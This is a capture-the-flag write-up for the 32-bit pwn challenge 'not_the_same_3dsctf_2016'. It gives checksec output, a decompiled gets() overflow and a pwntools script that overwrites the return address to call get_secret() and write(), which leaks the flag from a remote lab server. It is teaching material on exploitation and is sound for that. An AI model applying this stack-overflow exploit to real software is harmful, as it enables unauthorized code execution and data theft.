
not_the_same_3dsctf_2016

ubuntu16


0x01


checksec

[*] '/home/zelas/Desktop/pwn/not_the_same_3dsctf_2016/not_the_same_3dsctf_2016'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled //栈不可执行
PIE: No PIE (0x8048000)

静态链接

$ file not_the_same_3dsctf_2016 
not_the_same_3dsctf_2016: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, not stripped

IDA

/* IDA decompilation of the target's main(): prints a banner, then reads a
 * line into a fixed 45-byte stack buffer with gets(). Nothing here calls
 * get_secret(); the exploit has to reach it by overwriting the return address. */
int __cdecl main(int argc, const char **argv, const char **envp)
{
char v4[45]; // [esp+Fh] [ebp-2Dh] BYREF  -- 45 (0x2D) bytes, lying 0x2D below IDA's frame base

printf("b0r4 v3r s3 7u 4h o b1ch4o m3m0... ");
gets(v4); // unbounded read: anything past 45 bytes spills over the buffer onto the saved
          // frame/return address. checksec: no canary, no PIE -> a plain ret2text works.
return 0;
}

可疑字符串

.rodata:080BC2A8 00000009 C flag.txt

跟踪 看一下调用

Up o get_secret+C mov [esp+1Ch+var_1C], offset aFlagTxt; "flag.txt"

可疑函数

/* Reads the first line of flag.txt into the global buffer fl4g (0x080ECA2D).
 * The visible main() never calls it; the exploit returns into it (0x80489A0)
 * and then into write() to dump fl4g to stdout. */
int get_secret()
{
int v0; // esi  -- actually the FILE* returned by fopen; IDA typed it as int

v0 = fopen("flag.txt", &unk_80CF91B); // mode string lives at unk_80CF91B (unresolved here, presumably "r");
                                      // the result is never NULL-checked, so a missing flag.txt crashes in fgets
fgets(&fl4g, 45, v0); // reads at most 44 bytes (+ NUL) FROM the stream INTO fl4g @ 0x080ECA2D
return fclose(v0); // returns fclose's status, not the flag
}

//0x80489A0

0x02


思路

1.利用 gets() 的无边界写覆盖 main 的返回地址：先 ret 到 get_secret() 把 flag.txt 读进全局 fl4g，再 ret 到静态链接进来的 write() 把 fl4g 输出。程序无 canary、无 PIE 且静态链接，所有地址固定；NX 不构成障碍，因为整条链只复用已有代码、不在栈上执行指令。

s 0x2D          v4 位于 [ebp-0x2D]，45 字节填充
ebp 0x4         ← 注意：下面的脚本里并没有这 4 字节。payload 在 0x2D 字节填充后直接放 get_secret，说明
                IDA 的 [ebp-2Dh] 只是虚拟帧偏移，返回地址紧跟缓冲区；具体偏移请用 gdb/cyclic 核对
ret get_secret
get_secret_ret write()
write_ret 0xdeadbeef    write 返回后跳到这里，任意值即可（flag 已输出，之后崩溃无所谓）
arg[0] 1                stdout
arg[1] fl4g             0x080ECA2D
arg[2] 100              脚本中为 p32(100)；fgets 最多读 44 字节，长度 ≥ 45 即可

0x03


from pwn import *

context(os='linux', arch='i386', log_level='debug')
# io = process(['./not_the_same_3dsctf_2016'])
io = remote('node4.buuoj.cn', 27976)

# Every address is fixed: the binary is statically linked with no PIE (see checksec).
WRITE_ADDR = 0x806E270    # write() pulled in from the static libc
GET_SECRET = 0x80489A0    # get_secret(): fgets("flag.txt") -> fl4g
FL4G_ADDR = 0x080ECA2D    # global buffer that get_secret() fills
OVERFLOW_LEN = 0x2D       # v4 is 45 bytes; the return address is overwritten right
                          # after it -- this payload has no separate saved-ebp word,
                          # so confirm the offset with gdb if the chain does not fire
FLAG_LEN = 100            # fgets() stores at most 44 bytes + NUL, so 100 is plenty

# ret -> get_secret() -> write(1, fl4g, 100) -> 0xdeadbeef (crash after the leak)
chain = [
    GET_SECRET,
    WRITE_ADDR,
    0xdeadbeef,   # write()'s return address; never needs to be valid
    1,            # fd = stdout
    FL4G_ADDR,
    FLAG_LEN,
]
payload = b'a' * OVERFLOW_LEN + b''.join(p32(word) for word in chain)
io.sendline(payload)

io.interactive()

